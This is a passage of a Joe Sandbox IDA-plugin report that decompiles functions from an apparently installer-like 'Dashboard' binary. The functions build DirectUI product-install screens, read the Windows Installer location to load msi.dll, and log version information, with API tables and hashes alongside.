                                                                                                                      • Part of subcall function 0100CE8D: ?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ.UXCORE(0100D2E1), ref: 0100CE90
                                                                                                                      • Part of subcall function 0100CE8D: ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(00000000), ref: 0100CEA1
                                                                                                                    • ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(idProductListCont,00000000,00000000,00000000), ref: 010114CA
                                                                                                                      • Part of subcall function 0100C2F9: ?FindDescendent@Element@DirectUI@@QAEPAV12@G@Z.UXCORE(00000000,?,00000000,?,01012820,00000000,?,01012C67,00000000,?,01004488,?,00000009,Direct UI window,DUI Window Frame,00000001), ref: 0100C30C
                                                                                                                    • ?StrToID@DirectUI@@YGGPB_W@Z.UXCORE(00000000,00000000,00000000), ref: 010114DE
                                                                                                                    • ?Remove@Element@DirectUI@@QAEJPAV12@@Z.UXCORE(00000000,00000000), ref: 010114F1
                                                                                                                      • Part of subcall function 01006C01: TraceMessage.ADVAPI32(?,?,0000002B,?,?,NULL,0000000A,00000000), ref: 01006C5D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Direct$Element@$CriticalFindInfo@2@MessagePropertySectionTraceValue@Value@2@$AtomDescendent@Element@2@EnterH_prolog3_Host@LeaveLoadNativeRemove@String@@V12@V12@@
                                                                                                                    • String ID: Checkbox$idChkBoxSearch$idChkBoxSetHomePage$idFeaturesCont$idProductListCont
                                                                                                                    • API String ID: 2501247302-3429854558
                                                                                                                    • Opcode ID: 4153eefac52b9abbf676dfddcff4d95607ed15e68bd8e8ad2b4ce932740ad836
                                                                                                                    • Instruction ID: 2f4eeeb802b7e7a37a14a191ad2175f0456b7f652372a30653f2b7035d170561
                                                                                                                    • Opcode Fuzzy Hash: 4153eefac52b9abbf676dfddcff4d95607ed15e68bd8e8ad2b4ce932740ad836
                                                                                                                    • Instruction Fuzzy Hash: 0161F830A00216ABFB6BBBB5DD48BAD7AE5AF14340F0541D4EAC5A72D9CB39CD408F50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 70%
                                                                                                                    			E0101415E() {
                                                                                                                    				signed int _v8;
                                                                                                                    				short _v44;
                                                                                                                    				short _v148;
                                                                                                                    				void _v666;
                                                                                                                    				short _v668;
                                                                                                                    				void* _v672;
                                                                                                                    				int _v676;
                                                                                                                    				void* __edi;
                                                                                                                    				void* __esi;
                                                                                                                    				signed int _t21;
                                                                                                                    				long _t37;
                                                                                                                    				void* _t39;
                                                                                                                    				signed int _t40;
                                                                                                                    				void* _t42;
                                                                                                                    				void* _t46;
                                                                                                                    				void* _t54;
                                                                                                                    				signed int _t56;
                                                                                                                    
                                                                                                                    				_t21 =  *0x101a2b4; // 0xcf26dccf
                                                                                                                    				_v8 = _t21 ^ _t56;
                                                                                                                    				_t40 = 0x1a;
                                                                                                                    				memcpy( &_v148, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer", _t40 << 2);
                                                                                                                    				_t42 = 9;
                                                                                                                    				_t54 = L"InstallerLocation";
                                                                                                                    				memcpy( &_v44, _t54, 0 << 2);
                                                                                                                    				_t52 = _t54 + _t42 + _t42;
                                                                                                                    				_v672 = 0;
                                                                                                                    				_v668 = 0;
                                                                                                                    				memset( &_v666, 0, 0x206);
                                                                                                                    				_v676 = 0x208;
                                                                                                                    				if(RegOpenKeyExW(0x80000002,  &_v148, 0, 0x20019,  &_v672) != 0) {
                                                                                                                    					_t30 =  &_v668;
                                                                                                                    					goto L4;
                                                                                                                    				} else {
                                                                                                                    					_t37 = RegQueryValueExW(_v672,  &_v44, 0, 0,  &_v668,  &_v676);
                                                                                                                    					_t52 = _t37;
                                                                                                                    					RegCloseKey(_v672);
                                                                                                                    					_t30 =  &_v668;
                                                                                                                    					if(_t37 != 0) {
                                                                                                                    						L4:
                                                                                                                    						__imp__wcscpy_s(_t30, 0x104, L"msi.dll");
                                                                                                                    					} else {
                                                                                                                    						__imp__wcscat_s( &_v668, 0x104, L"\\msi.dll");
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				return E010087FB(LoadLibraryW( &_v668), _t39, _v8 ^ _t56, _t46, _t52, 0);
                                                                                                                    			}




















                                                                                                                    0x01014169
                                                                                                                    0x01014170
                                                                                                                    0x01014177
                                                                                                                    0x01014185
                                                                                                                    0x01014187
                                                                                                                    0x01014188
                                                                                                                    0x01014190
                                                                                                                    0x01014190
                                                                                                                    0x010141a1
                                                                                                                    0x010141a7
                                                                                                                    0x010141ae
                                                                                                                    0x010141cf
                                                                                                                    0x010141e1
                                                                                                                    0x0101422e
                                                                                                                    0x00000000
                                                                                                                    0x010141e3
                                                                                                                    0x010141fd
                                                                                                                    0x01014209
                                                                                                                    0x0101420b
                                                                                                                    0x01014213
                                                                                                                    0x01014219
                                                                                                                    0x01014234
                                                                                                                    0x0101423f
                                                                                                                    0x0101421b
                                                                                                                    0x01014226
                                                                                                                    0x01014226
                                                                                                                    0x01014219
                                                                                                                    0x01014262

                                                                                                                    APIs
                                                                                                                    • memset.MSVCR80 ref: 010141AE
                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?), ref: 010141D9
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000208), ref: 010141FD
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0101420B
                                                                                                                    • wcscat_s.MSVCR80 ref: 01014226
                                                                                                                    • wcscpy_s.MSVCR80 ref: 0101423F
                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 0101424F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseLibraryLoadOpenQueryValuememsetwcscat_swcscpy_s
                                                                                                                    • String ID: InstallerLocation$SOFTWARE\Microsoft\Windows\CurrentVersion\Installer$\msi.dll$msi.dll
                                                                                                                    • API String ID: 3826571250-3337234016
                                                                                                                    • Opcode ID: b93aa61194f85a5e295c5fa3633998d0ec36e6f821ce7e7ada797f183a71aa1c
                                                                                                                    • Instruction ID: e7a402fca11ff6e97eafee537c45a6f05cf2e59af719fdfca726a2adcf9cfe46
                                                                                                                    • Opcode Fuzzy Hash: b93aa61194f85a5e295c5fa3633998d0ec36e6f821ce7e7ada797f183a71aa1c
                                                                                                                    • Instruction Fuzzy Hash: 19213B72A00228AFDB21CB55EC4DEDAB7BCFB45310F440095F98DE7085DBB59A84CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 56%
                                                                                                                    			E0100DB70(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				void* _t35;
                                                                                                                    				intOrPtr _t36;
                                                                                                                    				intOrPtr _t40;
                                                                                                                    				void* _t41;
                                                                                                                    				intOrPtr _t43;
                                                                                                                    				intOrPtr _t45;
                                                                                                                    				intOrPtr _t46;
                                                                                                                    				intOrPtr _t48;
                                                                                                                    				void* _t63;
                                                                                                                    
                                                                                                                    				_push(8);
                                                                                                                    				_t35 = E0100880F(E01015F90, __ebx, __edi, __esi);
                                                                                                                    				 *((intOrPtr*)(_t63 - 0x14)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t63 - 4)) = 0;
                                                                                                                    				if( *((intOrPtr*)(_t63 + 8)) != 0) {
                                                                                                                    					__imp__?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ();
                                                                                                                    					if(_t35 != 0) {
                                                                                                                    						__imp__?StrToID@DirectUI@@YGGPB_W@Z(_t35);
                                                                                                                    						_t36 = E0100C2F9(_t35, _t35,  *((intOrPtr*)(_t63 + 8)));
                                                                                                                    						 *((intOrPtr*)(_t63 - 0x10)) = _t36;
                                                                                                                    						if(_t36 == 0) {
                                                                                                                    							goto L3;
                                                                                                                    						}
                                                                                                                    						_push(_t36);
                                                                                                                    						if( *((char*)(_t63 + 0xc)) == 0) {
                                                                                                                    							_push(L"ProductInstallErrorCross");
                                                                                                                    							_t61 = E0100D10E();
                                                                                                                    							if(_t39 == 0) {
                                                                                                                    								goto L3;
                                                                                                                    							}
                                                                                                                    							_t40 =  *0x101a004; // 0x101a004
                                                                                                                    							if(_t40 != 0x101a004 && ( *(_t40 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    								_t32 = _t40 + 0x14; // 0x65637845
                                                                                                                    								_t33 = _t40 + 0x10; // 0x6c744143
                                                                                                                    								_t40 = E01006C01( *_t33,  *_t32, 0x36, 0x1002308,  *((intOrPtr*)(_t63 + 8)));
                                                                                                                    							}
                                                                                                                    							_t41 = E0100C840(_t40, _t61, 1);
                                                                                                                    							L24:
                                                                                                                    							_t50 = _t41;
                                                                                                                    							L25:
                                                                                                                    							__imp__#6(0);
                                                                                                                    							return E010088FB(_t50);
                                                                                                                    						}
                                                                                                                    						_push(L"ProductInstallGreenCheck");
                                                                                                                    						_t51 = E0100D10E();
                                                                                                                    						if(_t42 == 0) {
                                                                                                                    							goto L3;
                                                                                                                    						}
                                                                                                                    						_t43 =  *0x101a004; // 0x101a004
                                                                                                                    						if(_t43 != 0x101a004 && ( *(_t43 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    							_t11 = _t43 + 0x14; // 0x65637845
                                                                                                                    							_t12 = _t43 + 0x10; // 0x6c744143
                                                                                                                    							_t43 = E01006C01( *_t12,  *_t11, 0x33, 0x1002308,  *((intOrPtr*)(_t63 + 8)));
                                                                                                                    						}
                                                                                                                    						_t50 = E0100C840(_t43, _t51, 1);
                                                                                                                    						if(_t44 < 0) {
                                                                                                                    							goto L25;
                                                                                                                    						} else {
                                                                                                                    							_t45 = E0100D136(L"ProductNameText",  *((intOrPtr*)(_t63 - 0x10)));
                                                                                                                    							 *((intOrPtr*)(_t63 + 0xc)) = _t45;
                                                                                                                    							if(_t45 == 0) {
                                                                                                                    								_t46 =  *0x101a004; // 0x101a004
                                                                                                                    								if(_t46 != 0x101a004 && ( *(_t46 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    									_t26 = _t46 + 0x14; // 0x65637845
                                                                                                                    									_t27 = _t46 + 0x10; // 0x6c744143
                                                                                                                    									E01006C01( *_t27,  *_t26, 0x35, 0x1002308,  *((intOrPtr*)(_t63 + 8)));
                                                                                                                    								}
                                                                                                                    								goto L25;
                                                                                                                    							}
                                                                                                                    							_t48 =  *0x101a004; // 0x101a004
                                                                                                                    							if(_t48 != 0x101a004 && ( *(_t48 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    								_t19 = _t48 + 0x14; // 0x65637845
                                                                                                                    								_t20 = _t48 + 0x10; // 0x6c744143
                                                                                                                    								_t48 = E01006C01( *_t20,  *_t19, 0x34, 0x1002308,  *((intOrPtr*)(_t63 + 8)));
                                                                                                                    							}
                                                                                                                    							_t41 = E0100C8D2(_t48,  *((intOrPtr*)(_t63 + 0xc)), L"ProductNameTextInstalled");
                                                                                                                    							goto L24;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					L3:
                                                                                                                    					_t50 = 0x8000ffff;
                                                                                                                    					goto L25;
                                                                                                                    				}
                                                                                                                    				_t50 = 0x80070057;
                                                                                                                    				goto L25;
                                                                                                                    			}












                                                                                                                    0x0100db70
                                                                                                                    0x0100db77
                                                                                                                    0x0100db7e
                                                                                                                    0x0100db84
                                                                                                                    0x0100db87
                                                                                                                    0x0100db96
                                                                                                                    0x0100db9e
                                                                                                                    0x0100dbae
                                                                                                                    0x0100dbb5
                                                                                                                    0x0100dbbc
                                                                                                                    0x0100dbbf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100dbc5
                                                                                                                    0x0100dbc6
                                                                                                                    0x0100dc7e
                                                                                                                    0x0100dc88
                                                                                                                    0x0100dc8c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100dc92
                                                                                                                    0x0100dc9c
                                                                                                                    0x0100dcae
                                                                                                                    0x0100dcb1
                                                                                                                    0x0100dcb4
                                                                                                                    0x0100dcb4
                                                                                                                    0x0100dcbd
                                                                                                                    0x0100dcc2
                                                                                                                    0x0100dcc2
                                                                                                                    0x0100dcc4
                                                                                                                    0x0100dcc6
                                                                                                                    0x0100dcd3
                                                                                                                    0x0100dcd3
                                                                                                                    0x0100dbcc
                                                                                                                    0x0100dbd6
                                                                                                                    0x0100dbda
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100dbdc
                                                                                                                    0x0100dbed
                                                                                                                    0x0100dbfb
                                                                                                                    0x0100dbfe
                                                                                                                    0x0100dc01
                                                                                                                    0x0100dc01
                                                                                                                    0x0100dc0f
                                                                                                                    0x0100dc13
                                                                                                                    0x00000000
                                                                                                                    0x0100dc19
                                                                                                                    0x0100dc21
                                                                                                                    0x0100dc28
                                                                                                                    0x0100dc2b
                                                                                                                    0x0100dc5c
                                                                                                                    0x0100dc63
                                                                                                                    0x0100dc71
                                                                                                                    0x0100dc74
                                                                                                                    0x0100dc77
                                                                                                                    0x0100dc77
                                                                                                                    0x00000000
                                                                                                                    0x0100dc63
                                                                                                                    0x0100dc2d
                                                                                                                    0x0100dc34
                                                                                                                    0x0100dc42
                                                                                                                    0x0100dc45
                                                                                                                    0x0100dc48
                                                                                                                    0x0100dc48
                                                                                                                    0x0100dc55
                                                                                                                    0x00000000
                                                                                                                    0x0100dc55
                                                                                                                    0x0100dc13
                                                                                                                    0x0100dba0
                                                                                                                    0x0100dba0
                                                                                                                    0x00000000
                                                                                                                    0x0100dba0
                                                                                                                    0x0100db89
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 0100DB77
                                                                                                                    • ?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ.UXCORE(00000008,0100F9E6,?,00000000), ref: 0100DB96
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0100DCC6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectElement@Element@2@FreeH_prolog3Host@NativeString
                                                                                                                    • String ID: ProductInstallErrorCross$ProductInstallGreenCheck$ProductNameText$ProductNameTextInstalled
                                                                                                                    • API String ID: 3502837760-1082744444
                                                                                                                    • Opcode ID: 747e6466150a54a847940e5313cbc9099f1150340b29d8cb6787f7d1bb1e2fb1
                                                                                                                    • Instruction ID: 460444cceb9f4f8a0c9b4fa495b0e4b4100cd96c7c7bdc1a3f6420ccccc00133
                                                                                                                    • Opcode Fuzzy Hash: 747e6466150a54a847940e5313cbc9099f1150340b29d8cb6787f7d1bb1e2fb1
                                                                                                                    • Instruction Fuzzy Hash: 4131E63064024AEBFB6B6FD8CD48F6D7EA2AF50740F048498F7C45A1E1CBB6C9409B61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E01007529(char* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				void* _t41;
                                                                                                                    				void* _t76;
                                                                                                                    				intOrPtr _t78;
                                                                                                                    				void* _t81;
                                                                                                                    
                                                                                                                    				_t76 = __edx;
                                                                                                                    				_t62 = __ebx;
                                                                                                                    				_push(0x26c);
                                                                                                                    				E01008882(E01015C43, __ebx, __edi, __esi);
                                                                                                                    				_t78 =  *((intOrPtr*)(_t81 + 8));
                                                                                                                    				 *((intOrPtr*)(_t81 - 0x260)) = 0;
                                                                                                                    				E01004D33(_t81 - 0x25c, 0x101a5f0);
                                                                                                                    				 *((intOrPtr*)(_t81 - 4)) = 0;
                                                                                                                    				GetModuleFileNameW(GetModuleHandleW(0), _t81 - 0x258, 0x104);
                                                                                                                    				 *(_t81 - 0x270) = 0;
                                                                                                                    				 *(_t81 - 0x26c) = 0;
                                                                                                                    				 *((intOrPtr*)(_t81 - 0x268)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t81 - 0x264)) = 0;
                                                                                                                    				 *((char*)(_t81 - 4)) = 1;
                                                                                                                    				_t41 = E01006E58(_t81 - 0x270, _t81 - 0x258);
                                                                                                                    				_t86 = _t41;
                                                                                                                    				if(_t41 >= 0) {
                                                                                                                    					__eflags =  *(_t81 - 0x26c);
                                                                                                                    					if( *(_t81 - 0x26c) == 0) {
                                                                                                                    						_t62 = 0;
                                                                                                                    						__eflags = 0;
                                                                                                                    					} else {
                                                                                                                    						_t62 = E01006FF1(_t81 - 0x270, _t76, L"InternalName");
                                                                                                                    					}
                                                                                                                    					__eflags = _t62;
                                                                                                                    					if(_t62 == 0) {
                                                                                                                    						_t62 = L"\"Not defined!\"";
                                                                                                                    					}
                                                                                                                    					E01006BB6(_t81 - 0x270, _t81 - 0x278);
                                                                                                                    					E01006A29(_t81 - 0x278, _t76, _t81 - 0x50, 0x20, 1);
                                                                                                                    					E010074B1(_t62, _t81 - 0x270, _t76, _t78, _t81 - 0x260);
                                                                                                                    					_push( *((intOrPtr*)(_t81 - 0x260)));
                                                                                                                    					_push(_t81 - 0x50);
                                                                                                                    					 *((char*)(_t81 - 4)) = 2;
                                                                                                                    					E0100720B(_t81 - 0x25c, L"Name: %s, Version: %s, Language: %s", _t62);
                                                                                                                    					E01005E50(_t78, __eflags, _t81 - 0x25c);
                                                                                                                    					__eflags =  *((intOrPtr*)(_t81 - 0x260)) + 0xfffffff0;
                                                                                                                    					E01004925( *((intOrPtr*)(_t81 - 0x260)) + 0xfffffff0, _t76);
                                                                                                                    				} else {
                                                                                                                    					E0100720B(_t81 - 0x25c, L"Failed to load version information from the resource. (hr = 0x%08x)", _t41);
                                                                                                                    					E01005E50(_t78, _t86, _t81 - 0x25c);
                                                                                                                    				}
                                                                                                                    				if(( *(_t81 - 0x270) & 0x00000001) != 0) {
                                                                                                                    					free( *(_t81 - 0x26c));
                                                                                                                    				}
                                                                                                                    				E01004925( *((intOrPtr*)(_t81 - 0x25c)) + 0xfffffff0, _t76);
                                                                                                                    				return E01008914(_t62, _t78, 0);
                                                                                                                    			}







                                                                                                                    0x01007529
                                                                                                                    0x01007529
                                                                                                                    0x01007529
                                                                                                                    0x01007533
                                                                                                                    0x01007538
                                                                                                                    0x01007548
                                                                                                                    0x0100754e
                                                                                                                    0x01007560
                                                                                                                    0x0100756a
                                                                                                                    0x01007570
                                                                                                                    0x01007576
                                                                                                                    0x0100757c
                                                                                                                    0x01007582
                                                                                                                    0x01007595
                                                                                                                    0x01007599
                                                                                                                    0x0100759e
                                                                                                                    0x010075a0
                                                                                                                    0x010075ca
                                                                                                                    0x010075d0
                                                                                                                    0x010075e6
                                                                                                                    0x010075e6
                                                                                                                    0x010075d2
                                                                                                                    0x010075e2
                                                                                                                    0x010075e2
                                                                                                                    0x010075e8
                                                                                                                    0x010075ea
                                                                                                                    0x010075ec
                                                                                                                    0x010075ec
                                                                                                                    0x010075fe
                                                                                                                    0x01007611
                                                                                                                    0x01007623
                                                                                                                    0x01007628
                                                                                                                    0x01007631
                                                                                                                    0x0100763f
                                                                                                                    0x01007643
                                                                                                                    0x01007654
                                                                                                                    0x0100765f
                                                                                                                    0x01007662
                                                                                                                    0x010075a2
                                                                                                                    0x010075af
                                                                                                                    0x010075c0
                                                                                                                    0x010075c0
                                                                                                                    0x0100766e
                                                                                                                    0x01007676
                                                                                                                    0x0100767c
                                                                                                                    0x01007686
                                                                                                                    0x01007692

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 01007533
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000104,0000026C,0100777B,?), ref: 01007563
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000), ref: 0100756A
                                                                                                                    • free.MSVCR80(?), ref: 01007676
                                                                                                                    Strings
                                                                                                                    • Failed to load version information from the resource. (hr = 0x%08x), xrefs: 010075A9
                                                                                                                    • Name: %s, Version: %s, Language: %s, xrefs: 01007639
                                                                                                                    • "Not defined!", xrefs: 010075EC, 01007632
                                                                                                                    • InternalName, xrefs: 010075D2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Module$FileH_prolog3_HandleNamefree
                                                                                                                    • String ID: "Not defined!"$Failed to load version information from the resource. (hr = 0x%08x)$InternalName$Name: %s, Version: %s, Language: %s
                                                                                                                    • API String ID: 3143548698-4059656801
                                                                                                                    • Opcode ID: cbab3780e8a25f20b3a3e81b748c3c48a2f37708b0307ea1dec3a86b67e69744
                                                                                                                    • Instruction ID: 800949e0de888b3b4b04df70d34c68c84461ff3b66be47b7a167e636bea11cd9
                                                                                                                    • Opcode Fuzzy Hash: cbab3780e8a25f20b3a3e81b748c3c48a2f37708b0307ea1dec3a86b67e69744
                                                                                                                    • Instruction Fuzzy Hash: 15317071D046699BEF27EBA4CC88AEDB778AF14700F1041D6B5C9A21C0EBB55B88CF54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 19%
                                                                                                                    			E01014BC5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				signed int _t32;
                                                                                                                    				signed int _t36;
                                                                                                                    				signed int _t40;
                                                                                                                    				void* _t45;
                                                                                                                    				void* _t46;
                                                                                                                    				signed int _t54;
                                                                                                                    				intOrPtr* _t63;
                                                                                                                    				void* _t64;
                                                                                                                    
                                                                                                                    				_push(0x28);
                                                                                                                    				E0100880F(E0101661F, __ebx, __edi, __esi);
                                                                                                                    				_t32 =  *(_t64 + 8);
                                                                                                                    				 *((char*)(_t64 - 0xd)) = 0;
                                                                                                                    				if(_t32 == 0) {
                                                                                                                    					L10:
                                                                                                                    					return E010088FB( *((intOrPtr*)(_t64 - 0xd)));
                                                                                                                    				}
                                                                                                                    				 *(_t64 + 8) =  *(_t64 + 8) & 0x00000000;
                                                                                                                    				 *(_t64 - 4) =  *(_t64 - 4) & 0x00000000;
                                                                                                                    				_push(_t64 + 8);
                                                                                                                    				_push(_t32);
                                                                                                                    				if( *((intOrPtr*)( *_t32 + 0x34))() < 0) {
                                                                                                                    					L8:
                                                                                                                    					_t36 =  *(_t64 + 8);
                                                                                                                    					 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
                                                                                                                    					if(_t36 != 0) {
                                                                                                                    						 *((intOrPtr*)( *_t36 + 8))(_t36);
                                                                                                                    					}
                                                                                                                    					goto L10;
                                                                                                                    				}
                                                                                                                    				__imp__#8(_t64 - 0x24);
                                                                                                                    				 *(_t64 - 4) = 1;
                                                                                                                    				E01014BA5(_t64 - 0x34, L"LaunchComponentId");
                                                                                                                    				_t54 =  *(_t64 + 8);
                                                                                                                    				asm("movsd");
                                                                                                                    				asm("movsd");
                                                                                                                    				asm("movsd");
                                                                                                                    				 *(_t64 - 4) = 2;
                                                                                                                    				asm("movsd");
                                                                                                                    				_t40 =  *((intOrPtr*)( *_t54 + 0x20))(_t54, _t64 - 0x24);
                                                                                                                    				_t63 = __imp__#9;
                                                                                                                    				asm("sbb bl, bl");
                                                                                                                    				 *(_t64 - 4) = 1;
                                                                                                                    				 *_t63(_t64 - 0x34);
                                                                                                                    				if( ~_t40 + 1 != 0) {
                                                                                                                    					_t45 = _t64 - 0x24;
                                                                                                                    					__imp__#12(_t45, _t45, 0, 8);
                                                                                                                    					if(_t45 >= 0) {
                                                                                                                    						_t46 = E01009528(_t64 - 0x14,  *((intOrPtr*)(_t64 - 0x1c)));
                                                                                                                    						__imp__#7( *((intOrPtr*)(_t64 - 0x14)));
                                                                                                                    						if(_t46 > 0) {
                                                                                                                    							 *((char*)(_t64 - 0xd)) = 1;
                                                                                                                    						}
                                                                                                                    						__imp__#6( *((intOrPtr*)(_t64 - 0x14)));
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				 *_t63(_t64 - 0x24);
                                                                                                                    				goto L8;
                                                                                                                    			}











                                                                                                                    0x01014bc5
                                                                                                                    0x01014bcc
                                                                                                                    0x01014bd1
                                                                                                                    0x01014bd6
                                                                                                                    0x01014bda
                                                                                                                    0x01014c9c
                                                                                                                    0x01014ca4
                                                                                                                    0x01014ca4
                                                                                                                    0x01014be0
                                                                                                                    0x01014be6
                                                                                                                    0x01014bed
                                                                                                                    0x01014bee
                                                                                                                    0x01014bf4
                                                                                                                    0x01014c8b
                                                                                                                    0x01014c8b
                                                                                                                    0x01014c8e
                                                                                                                    0x01014c94
                                                                                                                    0x01014c99
                                                                                                                    0x01014c99
                                                                                                                    0x00000000
                                                                                                                    0x01014c94
                                                                                                                    0x01014bfe
                                                                                                                    0x01014c0c
                                                                                                                    0x01014c10
                                                                                                                    0x01014c15
                                                                                                                    0x01014c25
                                                                                                                    0x01014c26
                                                                                                                    0x01014c27
                                                                                                                    0x01014c29
                                                                                                                    0x01014c2d
                                                                                                                    0x01014c2e
                                                                                                                    0x01014c31
                                                                                                                    0x01014c3e
                                                                                                                    0x01014c43
                                                                                                                    0x01014c47
                                                                                                                    0x01014c4b
                                                                                                                    0x01014c51
                                                                                                                    0x01014c56
                                                                                                                    0x01014c5e
                                                                                                                    0x01014c66
                                                                                                                    0x01014c6e
                                                                                                                    0x01014c76
                                                                                                                    0x01014c78
                                                                                                                    0x01014c78
                                                                                                                    0x01014c7f
                                                                                                                    0x01014c7f
                                                                                                                    0x01014c5e
                                                                                                                    0x01014c89
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 01014BCC
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 01014BFE
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 01014C47
                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 01014C56
                                                                                                                    • SysStringLen.OLEAUT32(?), ref: 01014C6E
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 01014C7F
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 01014C89
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearString$ChangeFreeH_prolog3InitType
                                                                                                                    • String ID: LaunchComponentId
                                                                                                                    • API String ID: 1400348697-3941572156
                                                                                                                    • Opcode ID: a2c8681d91920bbe7f845c4d8dec0658d5b4f0c916ea5efa35c601ea41d7af8e
                                                                                                                    • Instruction ID: ef7fa628cb9d3a552248a8ca0adeddc041cca4eb48b692761d585aca36340dc0
                                                                                                                    • Opcode Fuzzy Hash: a2c8681d91920bbe7f845c4d8dec0658d5b4f0c916ea5efa35c601ea41d7af8e
